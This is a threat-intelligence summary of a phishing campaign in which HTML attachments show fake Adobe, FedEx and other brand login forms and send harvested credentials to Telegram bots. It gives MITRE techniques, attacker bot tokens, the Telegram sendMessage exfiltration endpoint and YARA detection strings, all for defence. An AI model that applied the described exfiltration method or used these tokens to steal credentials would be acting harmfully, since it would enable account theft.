CRIL uncovered a widespread phishing campaign using self-contained HTML attachments that render fake Adobe-style login UIs and exfiltrate harvested credentials directly to attacker-controlled Telegram bots via the Bot API. The campaign reuses templates across multiple brands (Adobe, FedEx, WeTransfer, etc.), employs obfuscation and anti-analysis measures, and targets organizations primarily in Central and Eastern Europe. #Telegram #Adobe
Keypoints
- Attackers distribute RFC-compliant HTML attachments (e.g., RFQ_4460-INQUIRY.HTML) that render a fake login modal and do not require external hosting.
- Embedded JavaScript captures credentials from a simulated Adobe login form and posts them to the Telegram Bot API using hard-coded bot tokens and chat IDs.
- Samples show technical sophistication: AES obfuscation, dual-capture forcing re-entry, IP/user-agent collection, Fetch API use, and anti-forensics blocking of developer tools and key combinations.
- Multiple Telegram bots and tokens are actively used across samples (e.g., garclogtools_bot, v8one_bot) with evidence of infrastructure reuse across theme variants like FedEx and Adobe.
- Campaign targets organizations across Central and Eastern Europe (Czech Republic, Slovakia, Hungary, Germany) and spans many industries including government, manufacturing, hospitality, and logistics.
- Threat actors employ a modular template/toolkit enabling multi-brand impersonation (Adobe, Microsoft, WeTransfer, DocuSign, FedEx, DHL, Telekom) and multilingual lures.
- Recommended defenses include blocking/sandboxing .html attachments, detecting api.telegram.org POSTs from clients, and adding content inspection for HTML attachments referencing Telegram or credential-capture code.
MITRE Techniques
- [T1566.001 ] Phishing: Spearphishing Attachment – Malicious HTML attachments delivered via targeted emails (“delivered via targeted email attachments”).
- [T1204.002 ] User Execution: Malicious File – Execution occurs when users open the HTML attachment in a browser or PDF viewer that renders HTML (“Execution occurs when the user opens or runs a malicious file disguised as legitimate software or documents.”).
- [T1056.003 ] Input Capture via Web Form – The HTML page captures credentials entered into a simulated Adobe sign-in form and reads field values via JavaScript (“Captures user credentials and other sensitive information entered in web forms.”).
- [T1567.002 ] Exfiltration Over Web Service: Telegram API – Harvested credentials are sent via HTTP POST to https://api.telegram.org/bot/sendMessage with chat_id and text fields (“Sends stolen data via Telegram API.”).
- [T1027 ] Obfuscated/Encrypted File – Samples use AES encryption and other obfuscation to hide functionality and payloads (“Uses code obfuscation/encrypted files”).
Indicators of Compromise
- [File names ] Malicious HTML attachments – examples: RFQ_4460-INQUIRY.HTML, Quotation.html.
- [Telegram bot tokens ] Hard-coded exfiltration endpoints in JS – example pattern: 7447553175:AAF2ifSM0-b7OiF-E4ZzqeDVthDALq-IexQ, 8155473646:AAEZzrw4q_ZZws1J8mJOcqFix9bAnFYeFlo.
- [API endpoints ] Exfiltration and IP collection services – api.telegram.org/bot (exfiltration), api.ipify.org and http://ip-api.com (IP capture).
- [UI artifacts ] Embedded assets and form fields – blurred invoice background image and Adobe-themed modal with type=”password” field (and other themed assets).
- [YARA signature ] Detection strings – includes api.telegram.org/bot, /sendMessage, type=”password”, and regex for bot token format (and other rule indicators).
Read more: https://cyble.com/blog/multi-brand-phishing-campaign-harvests-credentials/